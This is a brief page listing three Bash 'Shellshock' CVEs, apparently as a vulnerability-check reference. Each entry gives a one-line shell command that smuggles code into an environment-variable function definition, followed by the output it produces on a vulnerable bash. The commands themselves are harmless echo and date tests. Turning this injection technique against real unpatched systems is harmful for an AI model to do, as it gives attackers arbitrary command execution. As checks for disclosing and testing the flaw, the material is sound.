1989

CVE-2014-6271

the original Shellshock

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
						

CVE-2014-7169

aka AfterShock

$ env var='() {(a)=>\' bash -c "echo date"; cat echo
bash: var: line 1: syntax error near unexpected token `='
bash: var: line 1: `'
bash: error importing function definition for `var'
Tue Oct  7 02:09:01 EDT 2014
						

CVE-2014-6277

still not fixed

$ var='() { echo vulnerable; }' bash -c var
vulnerable